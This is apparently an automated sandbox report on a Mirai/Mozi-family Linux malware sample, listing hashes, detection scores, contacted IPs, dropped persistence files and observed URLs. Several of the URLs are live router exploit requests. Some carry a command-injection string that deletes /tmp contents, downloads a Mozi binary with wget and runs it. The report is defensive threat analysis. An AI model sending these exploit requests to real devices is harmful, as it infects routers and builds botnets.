
bad_file

Status: finished
Submission Time: 2020-03-27 00:00:53 +01:00
Malicious
Spreader
Trojan
Evader
Mirai

Details

  • Analysis ID:
    218397
  • API (Web) ID:
    333712
  • Analysis Started:
    2020-03-27 00:00:54 +01:00
  • Analysis Finished:
    2020-03-27 00:08:47 +01:00
  • MD5:
    9a111588a7db15b796421bd13a949cd4
  • SHA1:
    034c8c51a58be11ca620ce3eb0d43d5a59275d2f
  • SHA256:
    e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
  • Technologies:

Joe Sandbox

Engine Detection Info
malicious
Score: 100
System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

malicious
Score: 38/59
malicious
Score: 17/40
malicious

IPs

IP  Country
202.32.159.161  Japan
20.58.72.148  United States
125.203.103.27  Japan
117.91.237.125  China
184.41.224.59  United States
59.24.146.66  Korea Republic of
148.160.88.153  Sweden
178.246.150.164  Turkey
146.216.3.16  Switzerland
137.92.166.90  Australia
36.130.17.34  China
157.122.23.74  China
77.243.24.218  Serbia
34.43.246.189  United States
124.117.118.192  China
90.93.31.32  France
98.130.55.126  United States
175.252.194.14  Korea Republic of
115.69.133.174  India
80.244.65.203  Sweden
93.129.162.40  Germany
17.118.162.234  United States
174.112.81.67  Canada
69.138.240.96  United States
201.0.17.175  Brazil
110.25.202.59  Taiwan; Republic of China (ROC)
40.55.196.197  United States
114.241.177.238  China
81.20.2.123  United Kingdom
183.155.137.94  China
176.208.119.10  Russian Federation
36.115.15.233  China
193.195.16.240  United Kingdom
12.176.45.163  United States
189.199.154.151  Mexico
6.156.246.251  United States
187.53.171.89  Brazil
37.69.223.188  France
16.53.242.88  United States
51.150.172.125  United Kingdom
126.100.201.40  Japan
140.217.189.31  United States
3.44.85.245  United States
89.204.253.144  Ireland
95.123.98.209  Spain
77.179.3.1  Germany
161.21.127.189  United States
19.49.225.155  United States
114.160.20.248  Japan
98.17.159.11  United States
12.20.239.35  United States
122.32.183.168  Korea Republic of
150.18.206.5  Japan
39.42.204.73  Pakistan
161.165.26.133  United States
135.85.115.169  United States
38.222.148.200  United States
221.140.154.116  Korea Republic of
5.240.38.180  Sweden
133.224.22.99  Japan
180.124.227.164  China
175.61.84.180  China
86.139.42.220  United Kingdom
191.159.218.255  Colombia
106.181.45.215  Japan
150.208.226.117  United States
77.88.194.62  Ukraine
41.27.174.179  South Africa
139.199.227.105  China
176.216.166.231  Turkey
47.160.207.156  United States
173.26.25.161  United States
19.251.188.20  United States
110.212.244.215  China
191.0.207.228  Brazil
94.115.215.230  Germany
115.150.164.244  China
28.242.177.230  United States
207.89.200.160  United States
185.170.103.99  United Kingdom
95.170.39.37  France
157.83.27.223  United Kingdom
194.44.151.71  Ukraine
118.250.168.199  China
66.216.37.70  United States
106.90.251.5  China
117.126.63.97  China
67.117.154.135  United States
181.192.4.243  Argentina
139.199.192.5  China
210.117.189.192  Korea Republic of
168.43.21.159  United States
146.186.130.161  United States
216.145.223.107  United States
119.92.40.84  Philippines
54.96.22.176  United States
83.33.145.175  Spain
9.125.222.67  United States
1.158.220.185  Australia
25.129.170.1  United Kingdom

URLs

Name Detection
http://132.147.104.91:80/HNAP1/
http://23.80.108.148:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://66.244.232.101:80/HNAP1/
http://221.122.86.92:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://153.131.15.233:80/HNAP1/
http://155.230.143.39:80/HNAP1/
http://190.193.6.237:80/HNAP1/
http://69.194.10.142:80/HNAP1/
http://127.0.0.1:5555/UD/act?1
http://34.232.24.180:80/HNAP1/
http://202.32.159.161:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:80/GponForm/diag_Form?images/
http://173.44.220.74:80/HNAP1/
http://114.40.23.230:80/HNAP1/
http://132.205.94.44:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.pastebin.ca
http://pastebin.ca)
http://www.pastebin.ca.
http://www.alsa-project.org.
http://156.250.119.72:49152/soap.cgi?service=WANIPConn1
http://123.58.44.88:37215/ctrlt/DeviceUpgrade_1
http://www.alsa-project.org/alsa-info.sh
http://103.42.38.18:37215/ctrlt/DeviceUpgrade_1
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://www.alsa-project.org/cardinfo-db/
http://www.pastebin.ca/upload.php
http://www.alsa-project.org
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://upx.sf.net
http://189.203.214.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

Dropped files

Name  (File Type)
/etc/init.d/mountdevsubfs.sh  (ASCII text)
/usr/networks  (ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped)
/etc/rcS.d/S95baby.sh  (POSIX shell script, ASCII text executable)
/etc/rc.local  (ASCII text)
/etc/profile.d/vte-2.91.sh  (ASCII text)
/etc/profile.d/cedilla-portuguese.sh  (ASCII text)
/etc/profile.d/bash_completion.sh  (ASCII text)
/etc/profile.d/apps-bin-path.sh  (ASCII text)
/etc/profile.d/Z97-byobu.sh  (ASCII text)
/etc/init.d/umountnfs.sh  (ASCII text)
/etc/init.d/mountnfs.sh  (ASCII text)
/etc/init.d/mountnfs-bootclean.sh  (ASCII text)
/etc/init.d/mountkernfs.sh  (ASCII text)
/etc/init.d/mountall.sh  (ASCII text)
/etc/init.d/hwclock.sh  (ASCII text)
/etc/init.d/S95baby.sh  (POSIX shell script, ASCII text executable)
/etc/init.d/bootmisc.sh  (ASCII text)
/etc/init.d/checkfs.sh  (ASCII text)
/etc/init.d/checkroot-bootclean.sh  (ASCII text)
/etc/init.d/checkroot.sh  (ASCII text)
/etc/init.d/hostname.sh  (ASCII text)
/etc/init.d/mountall-bootclean.sh  (ASCII text)
/usr/share/doc/git/contrib/remotes2config.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-revert.sh  (ASCII text)
/usr/share/doc/git/contrib/rerere-train.sh  (ASCII text)
/usr/share/doc/git/contrib/subtree/git-subtree.sh  (ASCII text)
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh  (ASCII text)
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh  (ASCII text)
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh  (ASCII text)
/usr/share/doc/git/contrib/git-resurrect.sh  (ASCII text)
/usr/share/doc/git/contrib/fast-import/git-import.sh  (ASCII text)
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-whatchanged.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-verify-tag.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-tag.sh  (ASCII text)
/usr/share/doc/netcat-openbsd/examples/dist.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-resolve.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-reset.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-repack.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-pull.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-notes.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-merge.sh  (ASCII text)
/usr/share/doc/mdadm/examples/mdadd.sh  (ASCII text)
/usr/share/keyutils/request-key-debug.sh  (ASCII text)
/usr/share/hplip/hplip_clean.sh  (ASCII text)
/usr/share/doc/xdotool/examples/ffsp.sh  (ASCII text)
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh  (ASCII text)
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh  (ASCII text)
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh  (ASCII text)
/usr/share/doc/tmux/examples/bash_completion_tmux.sh  (ASCII text)
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh  (ASCII text)
/usr/share/doc/gdb/contrib/gdb-add-index.sh  (ASCII text)
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh  (ASCII text)
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh  (ASCII text)
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh  (ASCII text)
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh  (ASCII text)
/usr/share/doc/libsane/plustek/MakeModule.sh  (ASCII text)
/usr/share/doc/ifupdown/examples/ping-places.sh  (ASCII text)
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh  (ASCII text)
/usr/share/doc/ifupdown/examples/get-mac-address.sh  (ASCII text)
/usr/share/doc/ifupdown/examples/check-mac-address.sh  (ASCII text)
/etc/wpa_supplicant/ifupdown.sh  (ASCII text)
/usr/share/doc/acpid/examples/ac.sh  (ASCII text)
/usr/share/debconf/confmodule.sh  (ASCII text)
/usr/share/cups/braille/indexv4.sh  (ASCII text)
/usr/share/cups/braille/indexv3.sh  (ASCII text)
/usr/share/cups/braille/index.sh  (ASCII text)
/usr/share/cups/braille/cups-braille.sh  (UTF-8 Unicode text)
/usr/share/brltty/initramfs/brltty.sh  (ASCII text)
/usr/share/alsa/utils.sh  (ASCII text)
/usr/share/alsa-base/alsa-info.sh  (ASCII text, with very long lines)
/usr/share/doc/acpid/examples/default.sh  (ASCII text)
/etc/wpa_supplicant/functions.sh  (ASCII text)
/etc/wpa_supplicant/action_wpa.sh  (ASCII text)
/etc/libreoffice/soffice.sh  (ASCII text)
/etc/bash_completion.d/libreoffice.sh  (ASCII text)
/etc/acpi/undock.sh  (ASCII text)
/etc/acpi/tosh-wireless.sh  (ASCII text)
/etc/acpi/powerbtn.sh  (ASCII text)
/etc/acpi/ibm-wireless.sh  (ASCII text)
/etc/acpi/asus-wireless.sh  (ASCII text)
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-ls-remote.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-log.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-gc.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-fetch.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-commit.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-clone.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-clean.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-checkout.sh  (ASCII text)
/usr/share/doc/git/contrib/examples/git-am.sh  (OS/2 REXX batch file, ASCII text)
/usr/share/doc/git/contrib/examples/git-merge-ours.sh  (ASCII text)
/etc/acpi/asus-keyboard-backlight.sh  (ASCII text)
/usr/share/doc/gdb/contrib/expect-read1.sh  (ASCII text)
/usr/share/doc/gdb/contrib/ari/gdb_find.sh  (ASCII text)
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh  (ASCII text)
/usr/share/doc/gawk/examples/prog/igawk.sh  (awk or perl script, ASCII text)
/usr/share/doc/gawk/examples/network/PostAgent.sh  (ASCII text)
/usr/share/doc/cron/examples/cron-tasks-review.sh  (ASCII text)
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh  (ASCII text)